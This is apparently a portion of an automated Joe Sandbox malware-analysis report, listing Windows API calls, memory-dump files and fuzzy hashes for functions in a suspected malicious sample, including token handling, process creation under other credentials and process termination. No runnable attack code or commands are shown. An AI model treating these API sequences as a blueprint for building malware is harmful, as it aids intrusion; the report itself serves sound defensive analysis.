                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 3172280962-24824748
                                                                                  • Opcode ID: 3f7f80b63b022e6fcfa42c11f862db335ed24647fbcf890e86e1009c7247e3f8
                                                                                  • Instruction ID: 96d1bf4af2451f84c6a64173024ab2ab82e1cd127ef2c087b46d66da97b0527d
                                                                                  • Opcode Fuzzy Hash: 3f7f80b63b022e6fcfa42c11f862db335ed24647fbcf890e86e1009c7247e3f8
                                                                                  • Instruction Fuzzy Hash: D1D161B06187129FC714DF24C484A2ABBE2FF99714F14885DF88A9B361DB31ED45CB92
                                                                                  APIs
                                                                                    • Part of subcall function 00220FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00220FCA
                                                                                    • Part of subcall function 00220FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00220FD6
                                                                                    • Part of subcall function 00220FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00220FE5
                                                                                    • Part of subcall function 00220FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00220FEC
                                                                                    • Part of subcall function 00220FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00221002
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00221335), ref: 002217AE
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002217BA
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002217C1
                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 002217DA
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00221335), ref: 002217EE
                                                                                  • HeapFree.KERNEL32(00000000), ref: 002217F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                  • String ID:
                                                                                  • API String ID: 3008561057-0
                                                                                  • Opcode ID: a0b48642c874e72e390beea94194a4c8c65ce02e33c019ccdb6daf89b89a2b46
                                                                                  • Instruction ID: 201a981b12683b8aa02e29a002d1968fc8626cdaeafbd05ef6e838cb01bb48ad
                                                                                  • Opcode Fuzzy Hash: a0b48642c874e72e390beea94194a4c8c65ce02e33c019ccdb6daf89b89a2b46
                                                                                  • Instruction Fuzzy Hash: EC11EE31520716FFDB208FE4EC48FAFBBA8EB95316F208028F4419B211D735A920CB60
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002214FF
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00221506
                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00221515
                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00221520
                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0022154F
                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00221563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                  • String ID:
                                                                                  • API String ID: 1413079979-0
                                                                                  • Opcode ID: ca0698e8e1e03f85b5627c0206f68a8e0530c2810f1d36dd65962b36d870751f
                                                                                  • Instruction ID: 074a2f17b2c622eaf16458ec69e7079cc654d129002d95cdfe0449deb50655f3
                                                                                  • Opcode Fuzzy Hash: ca0698e8e1e03f85b5627c0206f68a8e0530c2810f1d36dd65962b36d870751f
                                                                                  • Instruction Fuzzy Hash: 1E11447250020EBFDB119FA8ED49FDA7BA9EB48705F144064FA05A20A0D3718E70DB60
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,001E3379,001E2FE5), ref: 001E3390
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001E339E
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E33B7
                                                                                  • SetLastError.KERNEL32(00000000,?,001E3379,001E2FE5), ref: 001E3409
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: ffccfd61aa4c35a2d6ad442a96587b50728b0a5f95aa1356c81b6ee97d8b6c4c
                                                                                  • Instruction ID: c2deb3c7740cbb7a0712f7ff3ef75d274f238137639f468569ad9a516f8f03ef
                                                                                  • Opcode Fuzzy Hash: ffccfd61aa4c35a2d6ad442a96587b50728b0a5f95aa1356c81b6ee97d8b6c4c
                                                                                  • Instruction Fuzzy Hash: 3801243220AB51BFA72A27777C8D97E2A94EB293B97300229F430831F0EF614E015664
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,001F5686,00203CD6,?,00000000,?,001F5B6A,?,?,?,?,?,001EE6D1,?,00288A48), ref: 001F2D78
                                                                                  • _free.LIBCMT ref: 001F2DAB
                                                                                  • _free.LIBCMT ref: 001F2DD3
                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,001EE6D1,?,00288A48,00000010,001C4F4A,?,?,00000000,00203CD6), ref: 001F2DE0
                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,001EE6D1,?,00288A48,00000010,001C4F4A,?,?,00000000,00203CD6), ref: 001F2DEC
                                                                                  • _abort.LIBCMT ref: 001F2DF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  • Opcode ID: 1ec85ea7f4ef90c5f6ad64911f7b1878d96af89f6f9ec5f9d065c90493f6fc06
                                                                                  • Instruction ID: f4f78b2a2215b0372754b7c0cba780845e9d68d04166868554e4238431924010
                                                                                  • Opcode Fuzzy Hash: 1ec85ea7f4ef90c5f6ad64911f7b1878d96af89f6f9ec5f9d065c90493f6fc06
                                                                                  • Instruction Fuzzy Hash: EBF0A435545B1D3BC61227B4BC1EA3A2559BFD27A1B350519FB28932A2EF3489015260
                                                                                  APIs
                                                                                    • Part of subcall function 001D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
                                                                                    • Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96A2
                                                                                    • Part of subcall function 001D9639: BeginPath.GDI32(?), ref: 001D96B9
                                                                                    • Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96E2
                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00258A4E
                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00258A62
                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00258A70
                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00258A80
                                                                                  • EndPath.GDI32(?), ref: 00258A90
                                                                                  • StrokePath.GDI32(?), ref: 00258AA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                  • String ID:
                                                                                  • API String ID: 43455801-0
                                                                                  • Opcode ID: 36e20151af2eeb47a318a7312533db675ca9d796620ebf6edc67a6b6cb994b79
                                                                                  • Instruction ID: d6439a770d35ed2fc044b321f3ca3caf07162d9fb24c8997253009e331ae7b75
                                                                                  • Opcode Fuzzy Hash: 36e20151af2eeb47a318a7312533db675ca9d796620ebf6edc67a6b6cb994b79
                                                                                  • Instruction Fuzzy Hash: 3E111E7600024DFFEF119F90EC88EAA7F6CEB04351F148012BA19951A1D7719D55DF64
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00225218
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00225229
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00225230
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00225238
                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0022524F
                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00225261
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: 08d1e33b19d59f46a120b7a370792ae5f104af2f6ed8371435ad7e1ad39e206e
                                                                                  • Instruction ID: c39481478e31f547c0d0afeab74c19388952225f9301e456287d9df46e755b30
                                                                                  • Opcode Fuzzy Hash: 08d1e33b19d59f46a120b7a370792ae5f104af2f6ed8371435ad7e1ad39e206e
                                                                                  • Instruction Fuzzy Hash: 22014F75A00719BFEB109FE5AC49A5EBFB8EB48752F148065FA04A7281E6709D10CFA4
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C1BF4
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 001C1BFC
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C1C07
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C1C12
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 001C1C1A
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001C1C22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: 7e554a5d515510021ed81fea9270d11c5909199a9f20176c7a7f5ee9a06febc8
                                                                                  • Instruction ID: 8fc29cabbed34a8ba690cae76dc765377889c4c9ad7dd11a8d5b976208e352a8
                                                                                  • Opcode Fuzzy Hash: 7e554a5d515510021ed81fea9270d11c5909199a9f20176c7a7f5ee9a06febc8
                                                                                  • Instruction Fuzzy Hash: 870167B0902B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0022EB30
                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0022EB46
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0022EB55
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB64
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB6E
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: b6756b5979c98992c1bc146d58bf6e6fa0c9cc8a0826bd432bb853e8db0ccd08
                                                                                  • Instruction ID: 0f7647a657199a24ed9b42c64e2c861f4dd67df4056ffdf29c8ef31f970626f1
                                                                                  • Opcode Fuzzy Hash: b6756b5979c98992c1bc146d58bf6e6fa0c9cc8a0826bd432bb853e8db0ccd08
                                                                                  • Instruction Fuzzy Hash: E0F01772240758BFE7215BA2AC0EEEB3A7CEBCAB12F104158F601D1091A6B05A0196B9
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?), ref: 00217452
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00217469
                                                                                  • GetWindowDC.USER32(?), ref: 00217475
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00217484
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00217496
                                                                                  • GetSysColor.USER32(00000005), ref: 002174B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 272304278-0
                                                                                  • Opcode ID: 1ff4c6297249d0e8ab44f2ebea76be659c1815dc9b105ded6548a37b237d9b17
                                                                                  • Instruction ID: 337f17e60509883ac2be37f1a19329c0810df9cb1186ac0bb7e89afbb130a015
                                                                                  • Opcode Fuzzy Hash: 1ff4c6297249d0e8ab44f2ebea76be659c1815dc9b105ded6548a37b237d9b17
                                                                                  • Instruction Fuzzy Hash: 60018B31410305EFEB205FA4EC0CBEA7BB5FB44312F610060F916A31A0DB311E51EB14
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0022187F
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 0022188B
                                                                                  • CloseHandle.KERNEL32(?), ref: 00221894
                                                                                  • CloseHandle.KERNEL32(?), ref: 0022189C
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002218A5
                                                                                  • HeapFree.KERNEL32(00000000), ref: 002218AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 85494d2014da8bbd8c76ee361d2b144214cb6d83bdfbedf809a3ae65a6205fb7
                                                                                  • Instruction ID: b52c9f9aa41aa73afa1cdd96f68b2afb94efced330d42157b281285eb5243207
                                                                                  • Opcode Fuzzy Hash: 85494d2014da8bbd8c76ee361d2b144214cb6d83bdfbedf809a3ae65a6205fb7
                                                                                  • Instruction Fuzzy Hash: 1CE0C936004705BFDB016BA1FD0C905BB69FB497227208220F22981470DB325460DB54
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 001CBEB3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer
                                                                                  • String ID: D%)$D%)$D%)$D%)D%)
                                                                                  • API String ID: 1385522511-2662032602
                                                                                  • Opcode ID: a0af45b1e98306f48208db10c923b1ca8d9b79ad12a1d6b6d9f2febc4f4dd401
                                                                                  • Instruction ID: bd77e61bc35bdb95d60ae3011f7c6ea65d33deca075254a602fcda714fece356
                                                                                  • Opcode Fuzzy Hash: a0af45b1e98306f48208db10c923b1ca8d9b79ad12a1d6b6d9f2febc4f4dd401
                                                                                  • Instruction Fuzzy Hash: 57911775A0420ADFCB18CF99C092AAAB7F1FF68314F65416ED946EB350D731E981CB90
                                                                                  APIs
                                                                                    • Part of subcall function 001E0242: EnterCriticalSection.KERNEL32(0029070C,00291884,?,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E024D
                                                                                    • Part of subcall function 001E0242: LeaveCriticalSection.KERNEL32(0029070C,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E028A
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9
                                                                                  • __Init_thread_footer.LIBCMT ref: 00247BFB
                                                                                    • Part of subcall function 001E01F8: EnterCriticalSection.KERNEL32(0029070C,?,?,001D8747,00292514), ref: 001E0202
                                                                                    • Part of subcall function 001E01F8: LeaveCriticalSection.KERNEL32(0029070C,?,001D8747,00292514), ref: 001E0235
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                  • String ID: +T!$5$G$Variable must be of type 'Object'.
                                                                                  • API String ID: 535116098-1390543779
                                                                                  • Opcode ID: 41ae315846ee6d8648188f0b893d651b33fa06392ef1a3185e02eae0a10e9240
                                                                                  • Instruction ID: 36368f407ce7c179ad650e685b2a1dc531a7a0e1347e2cdeb5f80e735cd4040b
                                                                                  • Opcode Fuzzy Hash: 41ae315846ee6d8648188f0b893d651b33fa06392ef1a3185e02eae0a10e9240
                                                                                  • Instruction Fuzzy Hash: DE91AC70A24209EFCB08EF94D881DBDB7B1FF58304F508059F816AB292DB71AE65CB50
                                                                                  APIs
                                                                                    • Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0022C6EE
                                                                                  • _wcslen.LIBCMT ref: 0022C735
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0022C79C
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0022C7CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                  • String ID: 0
                                                                                  • API String ID: 1227352736-4108050209
                                                                                  • Opcode ID: eea72c8b1418cce316d5e0a3aa77d98169009fc2be4ba84d10a8fa5840fec056
                                                                                  • Instruction ID: 8ecfdec792d40abb6056c329c8910355d399c511be2c134560d62453d3371b9a
                                                                                  • Opcode Fuzzy Hash: eea72c8b1418cce316d5e0a3aa77d98169009fc2be4ba84d10a8fa5840fec056
                                                                                  • Instruction Fuzzy Hash: DE51F371624322ABD7109FA8E845B6EB7E8AF99310F24062DF995D31D0DB70D924CB52
                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0024AEA3
                                                                                    • Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625
                                                                                  • GetProcessId.KERNEL32(00000000), ref: 0024AF38
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024AF67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
